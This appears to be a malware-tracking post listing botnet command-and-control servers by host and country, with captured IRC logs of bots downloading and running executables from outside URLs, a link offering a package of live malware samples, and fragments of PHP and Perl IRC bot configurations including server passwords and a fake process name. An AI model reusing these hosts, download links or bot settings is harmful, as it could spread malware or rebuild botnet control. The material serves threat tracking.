Author: Pig

dns.photomarket.me (ngr bot hosted in Latvia Workstone Corporation)

Remote Host / Port Number:
194.247.48.62 1234 PASS priv9
213.251.170.52 80
64.62.181.43 80
66.197.139.152 80

PRIVMSG #ngr :[Ruskill]: Removing "C:\WINDOWS\system32\drwtsn32.exe" at reboot
PRIVMSG #ngr :[d="http://datapimp.fileave.com/setup1.exe" s="129024 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp"
NICK n{US|XP}rdhulwp
USER rdhulwp 0 0 :rdhulwp
JOIN #ngr
HELO
PRIVMSG #ngr :[d="http://mediamarkinc.in/install.52145.exe" s="73728 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp"
PRIVMSG #ngr

88.198.64.134 (botnet hosted in Germany Network Address For Servers)

88.198.64.134:2345
Nick: New[AUT|00|P|37328]
Username: XP-7319
Joined Channel: #!loco!
Channel Topic for Channel #!loco!: "D http://redir.ec/images2313?="
Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."
Private Message to Channel #!loco!: "[M]: Thread Disabled."
Private Message to User New[AUT|00|P|37328]: ".hp http://domredi.com/1/"

Info about hosting: http://whois.domaintools.com/88.198.64.134

14 mb malware samples

Here is another package with different malware samples. ii.exe is the bot exe from snk, our ruski hecker.

Download: http://c5be3f78.whackyvidz.com

91.121.96.162 (botnet hosted in France Paris Ovh Sas)

Remote Host / Port Number:
91.121.96.162 5540

MODE pLagUe{USA}50784 -ix
JOIN #drako
MODE #drako -ix
PONG irc2.accesox.net
PRIVMSG #drako : Hola Amos.
PONG A99D4269
JOIN ##verga##
MODE ##verga## -ix
PONG f2.accesox.net
MODE pLagUe{USA}55216 -ix
PRIVMSG ##verga## : NueVo PuTo InfeCcIoN.

Info about hosting: http://whois.domaintools.com/91.121.96.162

onlinedatingsecretfriends.com (malware hosted in United States Austin Road Runner Holdco Llc)

onlinedatingsecretfriends.com 97.79.238.39
127.0.0.1 127.0.0.1
onemouseklick.com 96.9.186.133
zonetf.com 96.9.169.85
freecdvideo.com 66.199.251.242
www.google.com 209.85.149.105
www.yahoo.com 87.248.122.122

Opened listening TCP connection on port: 55192
Outgoing connection to remote server: onlinedatingsecretfriends.com TCP port 80
Outgoing connection to remote server: freecdvideo.com TCP port 80
Outgoing connection to remote server: zonetf.com TCP port 80
Outgoing connection to remote server: zonetf.com TCP

h18811652163.rev.rootvps.pl (botnet hosted in Poland Www.hitme.net.pl)

Linux bots inside:

var $config = array("server"=>"188.116.52.163",
                    "port"=>"31336",
                    "pass"=>"haslo",
                    "prefix"=>"php",
                    "maxrand"=>"3",
                    "chan"=>"#php",
                    "chan2"=>"#php",
                    "key"=>"",
                    "modes"=>"+ps",
                    "password"=>"haslo",

Info about hosting: http://whois.domaintools.com/188.116.52.163

server.gasbian.com (botnet hosted in United States Chicago Hostforweb Inc)

205.234.145.229:2345
Nick: New[AUT|00|P|35974]
Username: XP-3032
Joined Channel: #!loco!
Channel Topic for Channel #!loco!: "D http://ibe.am/images004?="
Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."
Private Message to Channel #!loco!: "[M]: Thread Disabled."
Private Message to User New[AUT|00|P|35974]: ".hp http://domredi.com/1/"

Info about hosting: http://whois.domaintools.com/205.234.145.229

phython.no-ip.biz (botnet hosted in Korea, Republic Of Seoul Hanaro Telecom Inc)

Linux bots here from an Egyptian hecker:

my $fakeproc = "/usr/sbin/httpd";
my $ircserver = "phython.no-ip.biz";
my $ircport = "7000";
my $nickname = "BR[".int(rand(100))."]";
my $ident = "Bra";
my $channel = "#help";
my $admin = "Bjes";

Scanning actions:

Now talking in #help
Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ]
Topic By: [ Subali ]
Modes